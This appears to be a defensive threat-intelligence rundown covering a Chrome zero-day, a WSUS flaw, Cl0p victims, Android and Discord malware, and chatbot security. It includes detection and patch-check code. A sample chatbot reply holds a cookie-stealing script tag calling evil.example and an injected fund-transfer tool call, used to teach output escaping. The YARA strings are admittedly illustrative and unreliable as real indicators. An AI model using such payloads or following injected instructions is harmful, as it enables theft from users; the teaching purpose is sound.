A zero-day vulnerability in Google Chrome is being actively exploited in the wild to deliver an espionage tool named LeetAgent, attributed to the Italian surveillance-software vendor Memento Labs (formerly Hacking Team). Exploitation requires only that the victim open a link to an attacker-controlled page; the resulting arbitrary code execution leads to full compromise of the machine.
Business impact
Successful exploitation could lead to the theft of sensitive corporate data, intellectual property, and credentials. The espionage-focused nature of the payload suggests targeted attacks against specific industries or organizations, posing a severe risk of data breach and corporate espionage.
Recommended action
Immediately update all instances of Google Chrome to the latest version to patch the vulnerability, and do the same for other Chromium-based browsers (Edge, Brave, Opera), which ship the same fix on their own release schedules. Security teams should hunt for indicators of compromise associated with LeetAgent spyware, look for unexpected child processes spawned by the browser, and monitor outbound network traffic for unusual connections originating from browser processes.
A critical, actively exploited remote code execution vulnerability has been identified in Microsoft's Windows Server Update Services (WSUS). Threat actors are leveraging this flaw to gain remote control of unpatched servers; because every downstream client trusts the WSUS server for updates, a compromised server can then be used to distribute malware across the entire network that relies on it.
Business impact
A compromised WSUS server represents a catastrophic failure of the patch management infrastructure. Attackers can approve and deploy malicious updates, effectively gaining administrative access to every system in the network, leading to widespread ransomware deployment, data exfiltration, or persistent access.
Recommended action
Microsoft urges all organizations to apply the relevant patch immediately. Where patching is delayed, restrict inbound access to the WSUS ports (8530/TCP and 8531/TCP) to known downstream servers and clients, or temporarily disable the WSUS Server Role; a WSUS server should never be reachable from the internet. Monitor for unauthorized update approvals or configuration changes in the WSUS console, and for unexpected child processes spawned by the WSUS service (wsusservice.exe) or its IIS worker processes (w3wp.exe).
The Cl0p ransomware group has listed industrial manufacturing giants Schneider Electric and Emerson as victims on its data leak site. The listings are reportedly linked to Cl0p's campaign exploiting a flaw in Oracle E-Business Suite, third-party enterprise software run in the victims' own environments, rather than to a compromise of Oracle's own infrastructure. This incident highlights the significant supply chain risk posed by third-party software and service providers.
Business impact
The exposure of data from major industrial companies could reveal sensitive intellectual property, operational technology (OT) network details, and customer information. This could lead to targeted industrial espionage, disruption of critical infrastructure, and significant reputational damage.
Recommended action
Organizations running the affected Oracle software should apply Oracle's fixes and immediately review access logs and security configurations for signs of prior compromise, since Cl0p typically exfiltrates data well before a victim is listed. All companies should assess their third-party vendor risk, particularly for critical software providers, and have an incident response plan that accounts for supply chain breaches.
QNAP's NetBak PC Agent software is vulnerable due to a critical-severity flaw in the ASP.NET Core framework it bundles (specifically the Kestrel web server). The vulnerability allows an attacker to perform HTTP request smuggling, which can be used to bypass security controls, access sensitive data, modify server files, or trigger denial-of-service (DoS) conditions.
Business impact
Systems using the NetBak PC Agent for backups are at risk of data theft or modification. An attacker could potentially access or alter backup files, compromising data integrity and recovery capabilities. The DoS potential could also disrupt backup operations.
Recommended action
Users of QNAP NetBak PC Agent should follow QNAP's advisory to update the product and its bundled ASP.NET Core runtime as soon as the fix is available, and confirm the result by listing the installed runtimes with `dotnet --list-runtimes` on the host and comparing them against Microsoft's patched versions. Monitor web server logs for malformed or unusual HTTP requests, in particular requests carrying both Content-Length and Transfer-Encoding headers or chunked bodies with irregular chunk-size encodings, which are the classic smuggling primitives.
A new Android banking trojan, named Herodotus, is actively targeting users in Italy and Brazil. The malware is designed to perform on-device fraud and device takeover (DTO) attacks by mimicking human-like typing and behavior to bypass anti-fraud detection systems.
Business impact
This trojan poses a significant threat to organizations with mobile banking platforms and to employees using Android devices for corporate access. Its ability to evade detection can lead to unauthorized financial transactions, credential theft, and compromise of multi-factor authentication.
Recommended action
Advise users to only download applications from official app stores and be wary of granting excessive permissions. Deploy Mobile Threat Defense (MTD) solutions to detect and block malicious applications like Herodotus on corporate and BYOD devices.
A new Python-based information stealer, RedTiger, is targeting gamers through the Discord platform. The malware is capable of stealing a wide range of sensitive information, including authentication tokens, passwords, payment card details, and can even capture images from the victim's webcam.
Business impact
While targeting gamers, the techniques and stolen credentials can easily impact corporate environments. Compromised employee credentials can be used to access corporate networks, and stolen payment information poses a direct financial risk. The use of Discord as a C2 channel can blend in with legitimate traffic.
Recommended action
Educate employees on the risks of using corporate devices for gaming or personal communication platforms like Discord. Enforce multi-factor authentication (MFA) on all critical accounts to mitigate the impact of stolen credentials, and treat Discord and browser session tokens as credentials to be revoked when a host is compromised. Monitor network traffic for connections to Discord webhook endpoints (discord.com/api/webhooks/...), which RedTiger uses for exfiltration, from hosts and processes that have no business using Discord.
As businesses rapidly adopt AI chatbots for customer service and internal operations, securing these conversational AI platforms has become mission-critical. This analysis highlights common vulnerabilities such as data poisoning, prompt injection, and insecure output handling. Leaders must implement robust AI risk management strategies, including data encryption, strong authentication, and continuous model monitoring, to protect user privacy, prevent data leakage, and maintain customer trust in these emerging technologies.
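Insecure output handling, one of the chatbot vulnerabilities listed above, is easiest to see in code. The following is an added example for this rundown, not code from the analysis it summarises; it assumes a hypothetical chat backend whose model replies may contain attacker-influenced text (for instance after prompt injection through a retrieved document) together with a list of requested tool calls, and shows the vulnerable rendering beside a hardened one plus an allow-listed tool dispatcher.

```python
"""Insecure output handling in a chatbot front end, shown beside a hardened
version. Added example for this rundown, not code from the analysis it
summarises. Assumes a hypothetical backend whose model replies carry free
text plus a list of requested tool calls.
"""
import html
import re

# Constructed model reply: an injected instruction made the model echo a script
# tag and request a tool the assistant was never meant to call.
MODEL_REPLY = {
    "text": 'Your balance is $1,250.<script>fetch("https://evil.example/?c="+document.cookie)</script>',
    "tool_calls": [
        {"name": "get_balance", "args": {"account_id": "1234"}},
        {"name": "transfer_funds", "args": {"to": "attacker", "amount": 1250}},
    ],
}


def render_insecure(reply):
    """VULNERABLE: model text is trusted and interpolated straight into HTML (XSS)."""
    return f"<div class='bot'>{reply['text']}</div>"


def render_hardened(reply):
    """Treat the model like any other untrusted input: encode for the output context."""
    return f"<div class='bot'>{html.escape(reply['text'], quote=True)}</div>"


# Tools the assistant may invoke, with a validator per argument. Anything the
# model asks for outside this table is dropped, never executed.
TOOL_ALLOWLIST = {
    "get_balance": {"account_id": re.compile(r"\d{1,12}")},
}


def dispatch_tools(reply, allowlist=TOOL_ALLOWLIST):
    """Split requested tool calls into those allowed to run and those rejected, with reasons."""
    accepted, rejected = [], []
    for call in reply.get("tool_calls", []):
        name, args = call.get("name"), call.get("args", {})
        schema = allowlist.get(name)
        if schema is None:
            rejected.append((name, "not allow-listed"))
        elif set(args) != set(schema) or not all(
            schema[k].fullmatch(str(v)) for k, v in args.items()
        ):
            rejected.append((name, "argument validation failed"))
        else:
            accepted.append(call)
    return accepted, rejected


if __name__ == "__main__":
    print(render_insecure(MODEL_REPLY))
    print(render_hardened(MODEL_REPLY))
    print(dispatch_tools(MODEL_REPLY))
```

The two controls are independent: escaping stops model text from becoming markup, and the allow-list stops injected instructions from becoming actions. Both are needed, because a model reply is attacker-reachable in the same way any other user-supplied field is.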
A major milestone has been reached in internet security: the majority of human-initiated traffic to Cloudflare is now protected by post-quantum key agreement (a hybrid of X25519 and ML-KEM negotiated in TLS 1.3). This proactive shift addresses the future threat of quantum computers capable of breaking today's public-key cryptography, and in particular "harvest-now, decrypt-later" attacks, in which adversaries record encrypted traffic today to decrypt it once a capable quantum computer exists. Note that this protects the key exchange only; certificates and signatures still rely on classical algorithms, and the client must support the hybrid group for it to be negotiated. Organizations should inventory where they depend on public-key cryptography and begin planning their transition to quantum-resistant algorithms now.
Spotlight Rationale: Today's intelligence highlights the growing complexity of software supply chain security, with threats living inside application components and containers, as noted in the "Beyond The CVE" analysis. Traditional vulnerability scanning is insufficient for these modern, containerized applications.
Anchore addresses the limitations of traditional CVE scanning by providing deep container analysis. Instead of just matching CVEs, the platform inspects every layer of a container image, analyzing software packages, configurations, credentials, and third-party libraries. This provides a comprehensive Software Bill of Materials (SBOM) and allows security teams to enforce granular policies based not just on vulnerabilities, but also on operational best practices, license compliance, and the presence of sensitive data, directly countering the risks outlined in today's intelligence.
Actionable Platform Guidance: Integrate Anchore into the CI/CD pipeline to automatically scan container images at build time. Configure policies to block deployments that contain critical vulnerabilities, hardcoded secrets, or non-compliant software licenses. Use the deep analysis features to generate a complete SBOM for all production applications to improve visibility and accelerate incident response.
1. Jenkins Pipeline Stage: Anchore Image Scan
# Action: Integrate Anchore scan into a Jenkins CI/CD pipeline
# 1. Install the Anchore Container Image Scanner plugin in Jenkins.
# 2. Configure the Anchore service endpoint and credentials in the Jenkins
#    system configuration.
# 3. Add a stage to your Jenkinsfile (or the equivalent build step in a
#    Freestyle project) after the image has been built and pushed to a
#    registry the Anchore service can pull from. The plugin's 'name'
#    parameter is a file listing the images to scan (one per line), not the
#    image tag itself, so write that file first:
stage('Anchore Image Scan') {
    steps {
        writeFile file: 'anchore_images', text: 'my-app:latest\n'
        anchore name: 'anchore_images',
                policyBundleId: 'default-security-policy',
                bailOnFail: true,
                bailOnPluginFail: true
    }
}
# 4. Verification: the Jenkins build now fails if 'my-app:latest' violates the
#    specified Anchore policy bundle (bailOnFail) or if the scan itself cannot
#    complete (bailOnPluginFail), so a broken scanner cannot silently pass
#    images. Check the build console output for the detailed Anchore report.
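The policy gates described in the guidance (block on critical vulnerabilities, hardcoded secrets and non-compliant licences) can also be enforced as a plain script when the scanner cannot fail the build itself. The following is an added example for this rundown, not Anchore's code and not its output format: it assumes a hypothetical findings JSON (the constructed sample is embedded in the block) and a waiver list for accepted-risk IDs, and exits non-zero when any gate fires.

```python
"""Stand-alone policy gate over a container-scan result. Added example for
this rundown; not Anchore's code or output schema. Assumes a hypothetical
findings JSON (constructed sample below) and applies three gates: critical
vulnerabilities, detected secrets, denied licences. Usage as a CI step:
`python gate.py findings.json`; a non-zero exit fails the build.
"""
import json
import sys

SEVERITY_RANK = {"negligible": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}
BLOCK_AT = "critical"                          # lowest severity that fails the build
DENIED_LICENSES = {"AGPL-3.0", "SSPL-1.0"}      # example denylist (assumption)
WAIVED_VULNS = {"CVE-0000-0002"}                # accepted-risk IDs, reviewed out of band

# Constructed sample in a hypothetical schema; the CVE IDs are placeholders.
SAMPLE_FINDINGS = json.dumps({
    "image": "my-app:latest",
    "vulnerabilities": [
        {"id": "CVE-0000-0001", "package": "openssl", "severity": "Critical", "fix": "3.0.14"},
        {"id": "CVE-0000-0002", "package": "curl", "severity": "Critical", "fix": None},
        {"id": "CVE-0000-0003", "package": "zlib", "severity": "High", "fix": "1.3.1"},
    ],
    "secrets": [
        {"path": "/app/.env", "line": 3, "type": "aws_access_key_id"},
    ],
    "packages": [
        {"name": "left-pad", "version": "1.3.0", "license": "MIT"},
        {"name": "mongo-tools", "version": "100.9.0", "license": "SSPL-1.0"},
    ],
})


def evaluate(findings, block_at=BLOCK_AT, denied=DENIED_LICENSES, waived=WAIVED_VULNS):
    """Return a list of violation strings; an empty list means the image passes."""
    violations = []
    threshold = SEVERITY_RANK[block_at]
    for v in findings.get("vulnerabilities", []):
        sev = v.get("severity", "").lower()
        if SEVERITY_RANK.get(sev, 0) < threshold or v["id"] in waived:
            continue
        fix = f"fixed in {v['fix']}" if v.get("fix") else "no fix available"
        violations.append(f"{sev.upper()} {v['id']} in {v['package']} ({fix})")
    for s in findings.get("secrets", []):
        # Any hardcoded secret blocks, regardless of severity scoring.
        violations.append(f"SECRET {s['type']} at {s['path']}:{s['line']}")
    for p in findings.get("packages", []):
        if p.get("license") in denied:
            violations.append(f"LICENSE {p['license']} in {p['name']}@{p['version']}")
    return violations


def waived_hits(findings, waived=WAIVED_VULNS):
    """IDs on the waiver list that actually appear in this scan, for the audit trail."""
    return sorted(v["id"] for v in findings.get("vulnerabilities", []) if v["id"] in waived)


def main(argv):
    raw = open(argv[1]).read() if len(argv) > 1 else SAMPLE_FINDINGS
    findings = json.loads(raw)
    violations = evaluate(findings)
    for w in waived_hits(findings):
        print(f"WAIVED  {w}")
    for v in violations:
        print(f"BLOCK   {v}")
    print(f"{findings.get('image')}: {'FAIL' if violations else 'PASS'}")
    return 1 if violations else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Waivers are printed on every run rather than silently skipped, so an expired or forgotten exception remains visible in the build log.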
2. YARA Rule for LeetAgent Spyware (Associated with CVE-2025-2783)
rule Detect_Spyware_LeetAgent_Oct2025 {
    meta:
        description = "Detects potential artifacts of LeetAgent spyware, delivered via Chrome zero-day CVE-2025-2783."
        author = "Threat Rundown"
        date = "2025-10-28"
        reference = "https://thehackernews.com/2025/10/chrome-zero-day-exploited-to-deliver.html"
        severity = "high"
        tlp = "white"
    strings:
        // These are the rundown's illustrative indicators; validate each against
        // confirmed samples before relying on this rule in production.
        $s1 = "LeetAgent_C2_Connect_v1.3" ascii wide
        $s2 = "memento_labs_payload.dll" ascii wide
        $s3 = "/tmp/chrome_payload.bin" ascii wide
        $s4 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) LeetAgent/1.3" ascii wide
    condition:
        // Require either the specific User-Agent or two independent hits, so a
        // lone generic filename or path cannot trigger on unrelated files.
        filesize < 10MB and ($s4 or 2 of ($s*))
}
3. Splunk Query: Herodotus Device Takeover (DTO) Pattern
Use Case: Flags a user account that shows a new-device login, a password-reset request and an MFA-device change within a 10-minute window, in any order, which is the account-takeover sequence a Herodotus DTO attack produces on the banking side.
index=mobile_security sourcetype="mobile_app_logs"
    event_name IN ("new_device_login", "password_reset_request", "mfa_device_change")
| transaction user maxspan=10m
| search event_name="new_device_login" event_name="password_reset_request" event_name="mfa_device_change"
| eval risk_score=100
| table _time, user, device_id, app_name, duration, eventcount, risk_score, event_name
| sort -_time
Filtering to the three event types before `transaction` keeps the command from merging every event a user generates. After `transaction`, event_name is a multivalue field, so the `search` clause requires all three event types to be present in the same transaction; `duration` and `eventcount` are produced by `transaction` and show how compressed the sequence was.
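The same correlation, run offline over raw logs, as an added example for this rundown (not from the Herodotus report): a per-user sliding window that alerts once all three event types fall within 10 minutes, in any order, and emits one alert per completed sequence. The JSON-lines log format is a constructed sample, not a real mobile-app log schema.

```python
"""Offline equivalent of the Splunk DTO correlation. Added example for this
rundown; the log lines are a constructed sample, not a real schema.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
DTO_EVENTS = {"new_device_login", "password_reset_request", "mfa_device_change"}

# Constructed sample: bob shows the full sequence inside 10 minutes, carol has
# all three events but spread over 33 minutes, alice only logs in normally.
# Lines are deliberately out of time order, as shipped logs often are.
SAMPLE_LOGS = """\
{"ts": "2025-10-28T09:00:05Z", "user": "alice", "device_id": "d-111", "app_name": "bank-app", "event_name": "login"}
{"ts": "2025-10-28T09:02:00Z", "user": "carol", "device_id": "d-222", "app_name": "bank-app", "event_name": "new_device_login"}
{"ts": "2025-10-28T09:01:10Z", "user": "bob", "device_id": "d-999", "app_name": "bank-app", "event_name": "new_device_login"}
{"ts": "2025-10-28T09:03:42Z", "user": "bob", "device_id": "d-999", "app_name": "bank-app", "event_name": "password_reset_request"}
{"ts": "2025-10-28T09:08:15Z", "user": "bob", "device_id": "d-999", "app_name": "bank-app", "event_name": "mfa_device_change"}
{"ts": "2025-10-28T09:30:00Z", "user": "carol", "device_id": "d-222", "app_name": "bank-app", "event_name": "password_reset_request"}
{"ts": "2025-10-28T09:35:00Z", "user": "carol", "device_id": "d-222", "app_name": "bank-app", "event_name": "mfa_device_change"}
"""


def parse(lines):
    """Parse JSON lines and sort by event time, since logs arrive out of order."""
    events = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    events.sort(key=lambda r: r["ts"])
    return events


def detect_dto(lines, window=WINDOW, required=DTO_EVENTS):
    """Per-user sliding window, mirroring `transaction user maxspan=10m`."""
    pending = defaultdict(list)  # user -> relevant events still inside the window
    alerts = []
    for rec in parse(lines):
        if rec["event_name"] not in required:
            continue
        bucket = pending[rec["user"]]
        bucket.append(rec)
        # Drop events older than the window relative to the newest one.
        while bucket and rec["ts"] - bucket[0]["ts"] > window:
            bucket.pop(0)
        if {r["event_name"] for r in bucket} >= required:
            alerts.append({
                "_time": bucket[0]["ts"].isoformat(),
                "user": rec["user"],
                "device_id": sorted({r["device_id"] for r in bucket}),
                "app_name": rec["app_name"],
                "duration_s": int((rec["ts"] - bucket[0]["ts"]).total_seconds()),
                "event_name": [r["event_name"] for r in bucket],
                "risk_score": 100,
            })
            bucket.clear()  # one completed sequence yields one alert
    return sorted(alerts, key=lambda a: a["_time"], reverse=True)


if __name__ == "__main__":
    for alert in detect_dto(SAMPLE_LOGS):
        print(json.dumps(alert))
```

Carol's events never alert because the window is measured against the newest event: by the time her password reset arrives, the new-device login is 28 minutes old and has been evicted.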
4. PowerShell Script: Check for Critical WSUS Patch
# This script checks a list of WSUS servers for a specific Windows Update KB.
# Replace 'KB5012345' with the actual KB number for the WSUS patch. The fix
# ships as a different KB per Windows Server version, so group servers by OS
# build (or run once per KB) rather than using one ID for every host.
# Get-HotFix queries remote hosts over WMI/DCOM, so the account running this
# needs administrative rights on each target.
$servers  = Get-Content -Path .\servers.txt
$hotfixId = "KB5012345"
$results  = foreach ($server in $servers) {
    if (-not (Test-Connection -ComputerName $server -Count 1 -Quiet)) {
        Write-Host "[!] Cannot connect to $server." -ForegroundColor Yellow
        [pscustomobject]@{ Server = $server; Patch = $hotfixId; Status = "UNREACHABLE"; InstalledOn = $null }
        continue
    }
    try {
        $hotfix = Get-HotFix -Id $hotfixId -ComputerName $server -ErrorAction Stop
        Write-Host "[+] Patch $hotfixId is INSTALLED on $server (installed $($hotfix.InstalledOn))."
        [pscustomobject]@{ Server = $server; Patch = $hotfixId; Status = "INSTALLED"; InstalledOn = $hotfix.InstalledOn }
    } catch {
        # Get-HotFix reports "Cannot find the requested hotfix" when the KB is
        # absent; any other error (RPC/WMI access denied, etc.) is an
        # inconclusive query, not evidence that the patch is missing.
        if ($_.Exception.Message -match 'Cannot find') {
            Write-Host "[-] Patch $hotfixId is MISSING on $server." -ForegroundColor Red
            [pscustomobject]@{ Server = $server; Patch = $hotfixId; Status = "MISSING"; InstalledOn = $null }
        } else {
            Write-Host "[!] Query failed on ${server}: $($_.Exception.Message)" -ForegroundColor Yellow
            [pscustomobject]@{ Server = $server; Patch = $hotfixId; Status = "QUERY_FAILED"; InstalledOn = $null }
        }
    }
}
$results | Export-Csv -Path .\wsus-patch-status.csv -NoTypeInformation
$results | Where-Object Status -ne 'INSTALLED' | Format-Table -AutoSize
This rundown should provide a solid overview of the current threat landscape. Thank you to all our cyberheroes for your diligence and hard work. Stay vigilant!